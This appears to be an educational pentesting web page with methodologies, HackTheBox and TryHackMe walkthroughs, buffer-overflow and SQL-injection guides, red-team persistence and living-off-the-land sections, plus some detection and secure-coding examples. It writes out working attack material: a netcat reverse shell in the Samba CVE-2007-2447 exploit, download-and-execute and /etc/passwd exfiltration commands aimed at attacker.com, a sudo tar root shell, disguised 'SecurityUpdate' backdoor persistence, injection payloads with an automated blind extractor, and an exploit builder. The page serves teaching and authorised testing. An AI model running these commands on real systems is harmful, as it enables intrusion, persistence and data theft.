🎯 Penetration Testing Methodologies

Network Penetration Testing Methodology

Intermediate Network Security

Systematic approach to network penetration testing, from scoping and reconnaissance through exploitation.

Network Pentest Steps:

  1. Pre-Engagement
    • Define scope and rules of engagement
    • Obtain proper authorization
    • Set up testing environment
  2. Reconnaissance
    • Passive information gathering
    • Active network discovery
    • Port scanning and service enumeration
  3. Vulnerability Assessment
    • Automated vulnerability scanning
    • Manual verification of findings
    • Risk assessment and prioritization
  4. Exploitation
    • Develop and execute exploits
    • Gain initial access
    • Document proof of concept
Network Enumeration Script:
#!/bin/bash
# Usage: ./recon.sh <target-ip>   (-sS and -O need root; results are saved with -oA)
set -euo pipefail

TARGET="${1:?usage: $0 <target-ip>}"

echo "Starting network reconnaissance on $TARGET"

# Host discovery: ping sweep of the target's /24 (expects an IP, not a hostname)
echo "[+] Discovering live hosts..."
nmap -sn "${TARGET}/24" -oA "hosts_${TARGET}"

# Port scanning: SYN scan of the 100 most common ports with OS detection
echo "[+] Scanning top ports..."
nmap -sS -T4 -O -F "$TARGET" -oA "fast_${TARGET}"

# Service enumeration: -A already implies -sV, -sC, -O and --traceroute
echo "[+] Enumerating services..."
nmap -A "$TARGET" -oA "services_${TARGET}"

echo "Reconnaissance complete!"
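The script above leaves you with nmap's output files; the vulnerability assessment step (manual verification, prioritisation) starts from parsing them. The following is an added example, not code from the original page, showing how to pull open services out of the XML that `-oA` produces (`*.xml`) and order them for manual review. The XML is a constructed, trimmed sample; the service weights are an assumption you would tune per engagement.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output, trimmed to the elements used below.
# Hosts and versions are illustrative, not claims about any real system.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.10.10.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
      <port protocol="tcp" portid="80"><state state="filtered"/>
        <service name="http"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.10.10.4" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Assumed triage weights: higher means "look at this first". Adjust per engagement.
SERVICE_PRIORITY = {"netbios-ssn": 3, "microsoft-ds": 3, "telnet": 3, "ftp": 2,
                    "ms-wbt-server": 2, "http": 1, "https": 1, "ssh": 0}


def parse_open_services(xml_text):
    """Return one dict per open port on every host nmap reported as up."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            findings.append({"host": addr, "port": int(port.get("portid")),
                             "proto": port.get("protocol"), "service": get("name"),
                             "product": get("product"), "version": get("version")})
    return findings


def prioritize(findings):
    """Riskier service types first; within a type, fingerprinted services before
    unknown ones (a version string gives you something concrete to verify)."""
    return sorted(findings, key=lambda f: (-SERVICE_PRIORITY.get(f["service"], 1),
                                           f["version"] == "", f["host"], f["port"]))


if __name__ == "__main__":
    for f in prioritize(parse_open_services(SAMPLE_NMAP_XML)):
        print(f"{f['host']}:{f['port']}/{f['proto']}  {f['service']:<12} {f['product']} {f['version']}")
```

Feed the real file in with `parse_open_services(open("services_10.10.10.3.xml").read())`; filtered and closed ports are dropped so the list is only what you can actually touch.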

Active Directory Penetration Testing

Advanced Windows Security

Complete guide to testing Active Directory environments including enumeration, privilege escalation, and lateral movement.

AD Attack Chain:

  1. Initial Enumeration
    • Discover domain controllers
    • Enumerate users and groups
    • Identify service accounts
  2. Credential Attacks
    • Password spraying
    • AS-REP roasting
    • Kerberoasting
  3. Lateral Movement and Domain Dominance
    • Pass-the-Hash attacks
    • Golden/Silver tickets
    • DCSync attacks (need replication rights; normally Domain Admins or DC accounts)
BloodHound Enumeration:
# Run the SharpHound collector from a domain-joined host as a domain user
# (-d defaults to the current domain). -c All also enumerates sessions on
# every host, which is noisy; log it in the engagement notes.
.\SharpHound.exe -c All -d domain.com

# Import data into BloodHound
# Start BloodHound (neo4j must be running) and drag the generated ZIP onto the GUI

# Common pre-built queries:
# - Find Shortest Paths to Domain Admins
# - Find Computers with Unconstrained Delegation
# - Find Principals with DCSync Rights
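The credential attacks in the chain above each start from a directory query: AS-REP roasting needs accounts with Kerberos pre-authentication disabled, Kerberoasting needs user accounts with an SPN, and the delegation query needs the TRUSTED_FOR_DELEGATION flag. All three are bits in `userAccountControl` or the presence of `servicePrincipalName`. The following added example (not from the page, and not BloodHound's own logic) applies that triage to constructed LDAP-style records; the account names, SPNs and group DNs are invented, and the equivalent LDAP filters are given in the comments.

```python
# userAccountControl bit flags (values from Microsoft's ADS_USER_FLAG documentation)
ACCOUNTDISABLE            = 0x0002
NORMAL_ACCOUNT            = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
DONT_EXPIRE_PASSWORD      = 0x10000
TRUSTED_FOR_DELEGATION    = 0x80000    # unconstrained delegation
DONT_REQ_PREAUTH          = 0x400000   # Kerberos pre-authentication disabled

# Constructed directory objects shaped like the attributes an LDAP search returns.
# Names, SPNs and group DNs are made up for the example.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.com:1433"],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=com"]},
    {"sAMAccountName": "legacyapp", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "olduser", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/web01.domain.com"], "memberOf": []},
    {"sAMAccountName": "krbtgt", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"], "memberOf": []},
]


def triage_accounts(objects):
    """Split directory objects into the target lists behind the attack chain.
    1.2.840.113556.1.4.803 in the LDAP filters is the bitwise-AND matching rule;
    4194304 == 0x400000 (DONT_REQ_PREAUTH), 524288 == 0x80000, 2 == ACCOUNTDISABLE."""
    def flag(o, bit):
        return bool(o["userAccountControl"] & bit)

    enabled = [o for o in objects if not flag(o, ACCOUNTDISABLE)]
    user_with_spn = [o for o in enabled if o["servicePrincipalName"] and flag(o, NORMAL_ACCOUNT)
                     and o["sAMAccountName"].lower() != "krbtgt"]
    return {
        # (&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
        "asrep_roastable": [o["sAMAccountName"] for o in enabled if flag(o, DONT_REQ_PREAUTH)],
        # (&(servicePrincipalName=*)(objectCategory=user)(!(sAMAccountName=krbtgt)))
        # user accounts only: computer accounts have long random passwords that will not crack
        "kerberoastable": [o["sAMAccountName"] for o in user_with_spn],
        # (userAccountControl:1.2.840.113556.1.4.803:=524288)
        # domain controllers are expected to carry this flag; any other host is the finding
        "unconstrained_delegation": [o["sAMAccountName"] for o in enabled if flag(o, TRUSTED_FOR_DELEGATION)],
        # Kerberoastable and already privileged: crack these tickets first
        "privileged_spn": [o["sAMAccountName"] for o in user_with_spn
                           if any("CN=Domain Admins" in g for g in o["memberOf"])],
    }


if __name__ == "__main__":
    for category, names in triage_accounts(SAMPLE_OBJECTS).items():
        print(f"{category:<25} {names}")
```

Disabled accounts are dropped up front: a disabled user with pre-auth off still shows up in a raw LDAP search but cannot be roasted, and reporting it wastes the client's time.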

🏆 CTF Walkthroughs

HackTheBox - Lame Writeup

Beginner Linux

Step-by-step walkthrough of the classic Lame machine from HackTheBox.

Machine Information:

  • OS: Linux
  • Difficulty: Easy
  • IP: 10.10.10.3

Enumeration:

# Nmap scan
nmap -sC -sV -oA lame 10.10.10.3

# Results show:
# 21/tcp - vsftpd 2.3.4
# 22/tcp - OpenSSH 4.7p1
# 139/tcp - Samba smbd 3.0.20-Debian
# 445/tcp - Samba smbd 3.0.20-Debian

Exploitation:

Samba 3.0.20 (affected range: 3.0.20 through 3.0.25rc3) is vulnerable to CVE-2007-2447: when the "username map script" option is set, the unsanitised logon username is substituted into a shell command line, so shell metacharacters in the username execute as root.

# Using Metasploit
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0        # the attacker's VPN interface
exploit

# Manual exploitation: start a listener on the attacker box first (10.10.14.1 here)
#   nc -lvnp 4444
# The backtick command substitution in the logon name is evaluated by the target's shell.
smbclient //10.10.10.3/tmp -N
logon "/=`nohup nc -e /bin/sh 10.10.14.1 4444`"
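Why the `logon` payload works comes down to one line of code in the server: the username is spliced into a command string and handed to `/bin/sh -c`. The following is an added illustration, not Samba's source and not part of the original writeup, reproducing the vulnerable pattern next to the fix. The map script is replaced by `echo` (an assumption: the real option points at whatever program the administrator configured) and the backtick payload runs a harmless `echo` instead of `nc`; in Samba the command ran as root, here it runs as you.

```python
import subprocess

# Stand-in for the administrator's "username map script" (assumed); echo just reflects
# its argument so the effect of the injection is visible in the output.
MAP_SCRIPT = "echo"


def map_user_vulnerable(username):
    """Samba 3.0.20-3.0.25rc3 behaviour: substitute the client-supplied logon name into a
    command string and run it through /bin/sh -c, so backticks, $(...) and ; are honoured."""
    cmd = f"{MAP_SCRIPT} {username}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def map_user_fixed(username):
    """Patched behaviour: the name travels as a single argv element and no shell parses it."""
    return subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True).stdout.strip()


# Same shape as the Lame payload, with a harmless command in place of the reverse shell.
PAYLOAD = "/=`echo injected`"

if __name__ == "__main__":
    print("vulnerable:", map_user_vulnerable(PAYLOAD))   # the inner echo ran
    print("fixed:     ", map_user_fixed(PAYLOAD))        # backticks passed through literally
```

The `/=` prefix is not magic; it only has to keep the mapping syntax happy. Everything after it is attacker-controlled shell.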

TryHackMe - Basic Pentesting Room

Beginner Mixed

Complete walkthrough of the Basic Pentesting room covering web and SMB enumeration.

Reconnaissance Phase:

# Port scanning
nmap -sC -sV -oN nmap.txt TARGET_IP

# Web enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt

# SMB enumeration
enum4linux TARGET_IP
smbclient -L //TARGET_IP -N

Key Findings:

  • Web directory /development with notes that leak a username and hint at a weak password
  • Anonymous SMB share leaking staff usernames
  • SSH brute force with the discovered usernames for initial access
  • Privilege escalation via a readable SSH private key with a weak passphrase (cracked offline)

🔬 Vulnerability Research

Buffer Overflow Exploitation Guide

Advanced Binary Exploitation

Complete guide to identifying and exploiting buffer overflow vulnerabilities.

Exploitation Steps:

  1. Fuzzing - Find the crash point
  2. Controlling EIP - Identify offset
  3. Finding Bad Characters - Identify restricted bytes
  4. Finding JMP ESP - Locate reliable jump point
  5. Shellcode Generation - Create payload
  6. Exploitation - Execute the exploit
Fuzzing Script:
#!/usr/bin/python3
import socket
import sys

# Target and command prefix are the page's example (a vulnserver-style TRUN handler).
TARGET = ("192.168.1.100", 9999)
buffer = "A" * 100

while len(buffer) <= 4000:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(TARGET)
        s.recv(1024)                                   # service banner
        s.send(("TRUN /.:/" + buffer).encode())
        s.close()
    except (ConnectionRefusedError, ConnectionResetError, socket.timeout):
        # The service stopped answering, so the previous buffer (100 bytes shorter)
        # is the one that crashed it. Confirm in the debugger before moving on.
        print("Fuzzing crashed at {} bytes".format(len(buffer) - 100))
        sys.exit(1)
    buffer += "A" * 100

print("No crash up to {} bytes".format(len(buffer) - 100))
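Steps 2 to 6 above are mechanical once you have the crash, and they are easier to understand as code than as tool invocations. The following added example (not from the page; the helpers mirror what `pattern_create`/`pattern_offset` and mona do, but are written here from scratch) generates the cyclic pattern, recovers the offset from the EIP value seen in the debugger, builds and diffs the bad-character string, scans a module image for `jmp esp`, and assembles the final buffer. The module bytes and shellcode in the usage are constructed placeholders, and the exploit is assembled for an x86 little-endian target.

```python
import string
from struct import pack


def cyclic_pattern(length):
    """Non-repeating pattern in the style of msf pattern_create (Aa0Aa1...Ab0...).
    Every 4-byte window is unique within the first 20280 bytes, so the value that
    lands in EIP identifies exactly where in the buffer it came from."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip):
    """eip as read from the debugger, e.g. 0x386F4337. x86 is little-endian, so the
    four bytes that overwrote EIP appear in the pattern in reversed order."""
    needle = pack("<I", eip).decode("ascii")
    return pattern.find(needle)


def badchar_test_string(exclude=frozenset({0x00})):
    """Every byte value except those already known bad (0x00 always, it ends C strings)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent, observed):
    """Diff what was sent against the bytes the debugger shows on the stack. Everything
    after the first mangled byte is unreliable, so one bad char is found per iteration."""
    for s, o in zip(sent, observed):
        if s != o:
            return s
    return None


def find_jmp_esp(module, base, bad=frozenset({0x00})):
    """Addresses of `jmp esp` (FF E4) in a module image you have read from the target,
    skipping any address whose encoding contains a bad character."""
    hits, i = [], module.find(b"\xff\xe4")
    while i != -1:
        addr = base + i
        if not set(pack("<I", addr)) & bad:
            hits.append(addr)
        i = module.find(b"\xff\xe4", i + 1)
    return hits


def build_exploit(prefix, offset, jmp_addr, shellcode, nop_sled=16):
    """prefix | padding up to EIP | return address | NOP sled | shellcode"""
    return prefix + b"A" * offset + pack("<I", jmp_addr) + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    pat = cyclic_pattern(3000)
    print("offset:", pattern_offset(pat, 0x386F4337))
    sent = badchar_test_string()
    observed = sent[:9] + b"\x00" * (len(sent) - 9)    # constructed dump: 0x0A truncated the copy
    print("bad char: 0x%02x" % first_bad_char(sent, observed))
    module = b"\x90" * 0x100 + b"\xff\xe4" + b"\x90" * 0x100 + b"\xff\xe4"   # constructed image
    print("jmp esp at:", [hex(a) for a in find_jmp_esp(module, 0x62500000)])
```

Generate the real shellcode with `msfvenom -p windows/shell_reverse_tcp ... -b "\x00\x0a"` once the bad characters are known, then `build_exploit(b"TRUN /.:/", offset, addr, shellcode)` is the payload the original fuzzing loop sent in place of the `A`s.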

SQL Injection Testing Methodology

Intermediate Web Security

Systematic approach to identifying and exploiting SQL injection vulnerabilities.

Testing Process:

  1. Parameter Identification
    • Map all input parameters
    • Test GET/POST parameters
    • Test headers and cookies
  2. Injection Testing
    • Boolean-based blind injection
    • Time-based blind injection
    • Error-based injection
    • Union-based injection
Manual Testing Payloads:
# Boolean-based (MySQL needs a space after --, or use # instead)
' OR '1'='1' -- 
' OR '1'='2' -- 

# Time-based (MSSQL, then MySQL)
'; WAITFOR DELAY '00:00:05' -- 
' OR SLEEP(5) -- 

# Union-based (column count must match the original query; find it with ORDER BY n first)
' UNION SELECT 1,2,3,4 -- 
' UNION SELECT @@version,2,3,4 -- 

# Error-based (MySQL: the duplicate-key error message leaks VERSION())
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) -- 
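The payloads above are easier to reason about against a query you can run. The following added example (not from the page) puts a vulnerable string-built login query next to its parameterised version on an in-memory SQLite database with constructed rows, runs the boolean and union payloads through both, and then goes one step beyond the page by automating boolean-based blind extraction: the same true/false oracle, asked once per candidate character. SQLite has no `SLEEP`, so the time-based payloads are not exercised here; `--` comments to end of line in SQLite without a trailing space.

```python
import sqlite3
import string


def make_db():
    """In-memory users table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret', 'admin');
        INSERT INTO users VALUES (2, 'alice', 'hunter2', 'user');
    """)
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = ("SELECT id, username, password, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchall()


def login_safe(db, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT id, username, password, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


def blind_extract(oracle, subquery, charset=string.ascii_letters + string.digits, max_len=32):
    """Boolean-based blind extraction. `oracle(username)` returns True when the injected
    condition holds. One yes/no question per (position, candidate character); stops when
    no character matches, i.e. substr() returned the empty string past the end."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = f"' OR (SELECT substr(({subquery}),{pos},1))='{ch}' --"
            if oracle(cond):
                found += ch
                break
        else:
            break
    return found


if __name__ == "__main__":
    db = make_db()
    print("boolean true :", login_vulnerable(db, "' OR '1'='1' --", "x"))
    print("boolean false:", login_vulnerable(db, "' OR '1'='2' --", "x"))
    print("union        :", login_vulnerable(db, "' UNION SELECT 1, name, sql, 4 FROM sqlite_master --", "x"))
    print("parameterised:", login_safe(db, "' OR '1'='1' --", "x"))
    oracle = lambda u: bool(login_vulnerable(db, u, "x"))
    print("blind        :", blind_extract(oracle, "SELECT password FROM users WHERE username='admin'"))
```

The union payload uses `sqlite_master` where the MySQL payloads use `INFORMATION_SCHEMA`; the technique is the same, only the catalogue table changes per DBMS. Note that `blind_extract` treats an empty result as "false", which is exactly the assumption a real application breaks when it returns a generic page for both outcomes; then you need a different oracle (an error, a timing difference) rather than a different payload.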

🔴 Red Team Tactics

Persistence Mechanisms

Advanced Post-Exploitation

Various techniques for maintaining persistent access to compromised systems.

Windows Persistence:

  • Registry Run Keys - Auto-start programs
  • Scheduled Tasks - Time-based execution
  • Services - Background processes
  • WMI Events - Event-triggered execution
Registry Persistence:
# Registry Run key: runs at the user's next logon; HKCU needs no admin rights
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\temp\backdoor.exe"

# Scheduled task: runs at logon as the current user (add /ru SYSTEM if you are admin)
schtasks /create /sc onlogon /tn "SecurityUpdate" /tr "C:\temp\backdoor.exe"

# Service: needs admin. The binary must speak the service control protocol or the
# SCM kills it after about 30 s (error 1053); start= auto is what makes it survive reboots
sc create "SecurityUpdate" binPath= "C:\temp\backdoor.exe" DisplayName= "Security Update Service" start= auto
sc start "SecurityUpdate"

Linux Persistence:

  • Cron Jobs - Scheduled execution
  • SSH Keys - Key-based access
  • Systemd Services - Service-based persistence
  • Bash Profile - Login-triggered execution

Living off the Land Techniques

Advanced Evasion

Using legitimate system tools and features for malicious purposes to avoid detection.

Windows LOLBAS:

# PowerShell download and execute (runs in memory; script block logging and AMSI still see it)
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"

# Certutil for download
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

# BitsTransfer for download (BITS jobs survive reboots and are recorded in the BITS event log)
Import-Module BitsTransfer
Start-BitsTransfer -Source "http://attacker.com/payload.exe" -Destination "C:\temp\payload.exe"

# WMI for execution (wmic is deprecated on current Windows builds; Invoke-CimMethod is the replacement)
wmic process call create "cmd.exe /c calc.exe"

Linux GTFOBins:

# Wget for download
wget http://attacker.com/payload.sh -O /tmp/payload.sh

# Curl for data exfiltration (--data-binary keeps the newlines; -d strips them)
curl -X POST --data-binary @/etc/passwd http://attacker.com/exfil

# Tar for privilege escalation (requires a sudo rule for tar; the checkpoint action runs as root)
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
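"Avoid detection" only holds while nobody is looking at command lines: every Windows example above has a distinctive argument string, and process-creation logging (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) records it. The following added example (not from the page) is the detection side of those four techniques, run over constructed process-creation records; the rule patterns and the Office-parent heuristic are assumptions to tune, and the paths and URLs are invented.

```python
import ntpath
import re

# One rule per LOLBAS technique above: (name, image basenames, command-line pattern).
LOLBAS_RULES = [
    ("certutil download/decode", {"certutil.exe"},
     re.compile(r"-urlcache|-decode", re.I)),
    ("powershell download cradle", {"powershell.exe", "pwsh.exe"},
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
                r"|\s-e(nc|ncodedcommand)?\s", re.I)),
    ("bits transfer", {"powershell.exe", "pwsh.exe", "bitsadmin.exe"},
     re.compile(r"start-bitstransfer|/transfer", re.I)),
    ("wmic process spawn", {"wmic.exe"},
     re.compile(r"process\s+call\s+create", re.I)),
]

# An Office application spawning any of these is a macro/phishing pattern: raise severity.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed process-creation records with the fields Sysmon Event ID 1 / Security 4688
# (command-line auditing on) provide. Paths, parents and URLs are invented.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell -c \"IEX(New-Object Net.WebClient).downloadString('http://attacker.com/payload.ps1')\""},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic process call create \"cmd.exe /c calc.exe\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -ep bypass -c Start-BitsTransfer -Source http://attacker.com/payload.exe -Destination C:\\temp\\payload.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -verify server.cer"},                       # benign use of the same binary
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c Get-Date"},                             # benign
]


def detect_lolbas(events):
    """One alert per (event, rule) match. ntpath is used so Windows paths split correctly
    even when this runs on a Linux analysis box."""
    alerts = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev["parent"]).lower()
        for name, images, pattern in LOLBAS_RULES:
            if image in images and pattern.search(ev["cmdline"]):
                alerts.append({"rule": name, "image": image, "parent": parent,
                               "severity": "high" if parent in OFFICE_PARENTS else "medium",
                               "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect_lolbas(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['rule']}: {a['parent']} -> {a['image']}: {a['cmdline']}")
```

The benign `certutil -verify` and `Get-Date` records produce nothing, which is the point of keying on arguments rather than on the binary: the binary is legitimate by definition, the argument string is the tell.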

📱 Mobile Security Testing

Android Application Security Testing

Intermediate Mobile

Comprehensive guide to testing Android applications for security vulnerabilities.

Testing Environment Setup:

  1. Install Android SDK and ADB
  2. Set up Android emulator or rooted device
  3. Install security testing tools (Frida, MobSF, etc.)
Static Analysis Commands:
# APK analysis
aapt dump badging app.apk          # package name, version, permissions, launchable activity
d2j-dex2jar app.apk                # converts classes.dex; writes app-dex2jar.jar
jd-gui app-dex2jar.jar             # decompile the converted classes

# Certificate analysis (reads the signing certificate straight out of the APK;
# the alternative is to unzip the APK and point -file at META-INF/CERT.RSA)
keytool -printcert -jarfile app.apk

# Manifest analysis (the binary XML dumped as a tree; apktool d app.apk gives plain XML)
aapt dump xmltree app.apk AndroidManifest.xml

Dynamic Analysis:

  • Runtime application analysis
  • API hooking with Frida
  • Network traffic interception
  • File system monitoring

⚠️ Ethical Use Only

All techniques and methodologies described here are for educational purposes and authorized security testing only. Unauthorized use of these techniques is illegal and unethical. Always ensure you have explicit written permission before testing any system.

🔗 Join the Community


Discord Chat

Join our active cybersecurity community for real-time discussions


Matrix Room

Encrypted chat for privacy-focused security discussions


Live Chat

Join our integrated chatroom directly on the website


Community Guidelines

  • 🛡️ Keep discussions professional and educational
  • ⚠️ No illegal activities or malicious content
  • 🤝 Be respectful to all community members
  • 📚 Share knowledge and help others learn